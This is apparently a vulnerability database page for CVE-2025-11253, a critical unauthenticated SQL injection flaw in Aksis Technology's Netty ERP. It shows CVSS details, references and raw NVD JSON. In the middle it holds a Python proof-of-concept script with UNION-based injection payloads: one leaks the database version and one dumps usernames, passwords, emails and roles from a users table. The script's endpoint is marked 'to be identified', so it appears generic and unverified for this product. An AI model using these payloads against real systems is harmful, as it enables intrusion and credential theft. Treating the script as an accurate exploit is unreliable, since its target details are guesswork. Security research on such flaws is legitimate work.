CVE-2025-11253

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aksis Technology Inc. Netty ERP allows SQL Injection.This issue affects Netty ERP: before V.1.1000.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Netty ERP < V.1.1000

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11253 SQL Injection PoC
# Target: Netty ERP < V.1.1000
# Type: Unauthenticated SQL Injection

import requests
import sys

target = "http://target-ip/netty-erp"

# SQL Injection payload to extract database version
payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL---"

# Example vulnerable endpoint (to be identified)
endpoint = "/api/search"
params = {"query": payload}

try:
    response = requests.get(f"{target}{endpoint}", params=params, timeout=10)
    if "5.7" in response.text or "8.0" in response.text:
        print("[+] SQL Injection confirmed - Database version leaked")
        print(f"[+] Response snippet: {response.text[:500]}")
    else:
        print("[-] Target may not be vulnerable")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Additional payload for data extraction
data_payload = "' OR '1'='1' UNION SELECT username,password,email,role,NULL FROM users---"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11253
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11253
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11253/
[4] VulDB https://vuldb.com/cve/CVE-2025-11253
[5] https://www.usom.gov.tr/bildirim/tr-25-0359

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11253", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:42.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aksis Technology Inc. Netty ERP allows SQL Injection.This issue affects Netty ERP: before V.1.1000."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0359", "source": "[email protected]"}]}}